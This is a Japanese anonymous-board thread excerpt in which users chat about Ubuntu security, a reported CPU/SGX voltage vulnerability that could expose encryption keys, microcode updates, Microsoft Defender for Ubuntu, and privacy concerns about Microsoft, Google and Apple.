115(1): 2019/12/12(木)02:35 ID:QpDguOY0(1) AAS
Linuxだから安全です。
116: 2019/12/12(木)19:43 ID:jaG34Ck9(2/2) AAS
>>114続き
44 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイ 5720-kui+)[] 投稿日:2019/12/12(木) 00:45:08.31 ID:gd2ZuGmF0 [1/2]
>1>19>26
なにこれ?
PC起動してないとCPUコントロール出来ないよね?
もしかして、ハードディスク暗号化してるPCを起動して、
暗号化解除する前にこの脆弱性使うと暗号化解除出来ちゃうとか?
>プロセッサ内で隠蔽されている暗号鍵
>秘匿領域
ここに何が格納されてるのか分からん
スーパーハッカー解説お願いします。
54 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイ e228-kui+)[] 投稿日:2019/12/12(木) 03:25:28.44 ID:QS0Nrunu0
>>44
ハードディスク暗号化してるPCを起動して、暗号化解除して使用してる最中に、
この脆弱性を使うとCPUが隠してた暗号鍵を見ることができる
63 名前:番組の途中ですがアフィサイトへの転載は禁止です (アウアウエー Sa3a-0Ppm)[sage] 投稿日:2019/12/12(木) 05:18:32.13 ID:nA2cuX1+a
>>51
電圧いじれる(管理者)権限があってもSGXでやり取りされてる内容が見られないってのがウリの機能なので
UHD-BDの暗号化解除機構に使われてるんやで
55 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイWW 5720-AQmm)[] 投稿日:2019/12/12(木) 03:55:03.70 ID:gd2ZuGmF0 [2/2]
>>54
それは結構やばいなあ
まあ、暗号化解除前では意味なさそうなのが救いだな
てか、cpuってハードディスクの暗号化解除後もcpu内に暗号を常時置いとくもんなの?
117: 2019/12/13(金)19:09 ID:ESmGY9a7(1/2) AAS
>>115
コアダンプしそう
118: 2019/12/13(金)19:14 ID:ESmGY9a7(2/2) AAS
Ubuntuアップデートしたらマイクロコード降ってきたけどこれかね
流石にそこまで早くないか
119(1): 2019/12/16(月)00:27 ID:Oy6287lw(1) AAS
MicrosoftがUbuntu用のDefender出すんだって?
120: 2019/12/16(月)05:28 ID:AxOoqKNy(1/2) AAS
LinuxサーバーはAzureしか選択肢が無くなったかもかも。
121: 2019/12/16(月)06:38 ID:AxOoqKNy(2/2) AAS
iOSもカバーしてるからAzureが本命かもしれないよ。
WSLがどうでも良いわけじゃないだろうけど。
122(1): 2019/12/16(月)20:16 ID:F52Y2AF9(1) AAS
>>119
MSの個人情報搾取に耐えかねてubuntuに逃げてきたのに
追いかけてくるってか...
123(1): 2019/12/17(火)02:23 ID:eJqKdH1L(1) AAS
>>122
MSってそんな個人情報抜いてるの?
Skypeで抜いてるのにはびびったが。
あれはそこそこ信用してただけにびっくりした。
Skypeごときの情報抜かないだろうって思ってた。
MSってGoogle並みに個人情報抜いてるの?
Googleは怖くて使えんわ
あんなの住所氏名電話番号全部バレてるだろ
124: 2019/12/17(火)03:54 ID:+GuS9PLu(1) AAS
くこの板の一部の信者はMSに親を殺された!とかわめいてるけど、実はgoogleの方がヤバいっていうね
125: 2019/12/17(火)07:05 ID:BN1fWjc1(1) AAS
ユーザーはキンタマ握られてるから誰も言わないだけで一番ヤバいのはApple
126: 2019/12/17(火)10:14 ID:d36jgmOT(1) AAS
最近はWindowsのアカウント作る時にできるだけMSアカウントを
作らせるよう誘導してくるな
Win8あたりからだった記憶があるけど、Win10が大型アップデート
するたびにどんどん露骨になってる印象
127: 2019/12/17(火)10:37 ID:h64x6iyX(1) AAS
たしかに。
上下前次1-新書関写板覧索設栞歴
あと 339 レスあります
スレ情報 赤レス抽出 画像レス抽出 歴の未読スレ AAサムネイル
ぬこの手 ぬこTOP 0.033s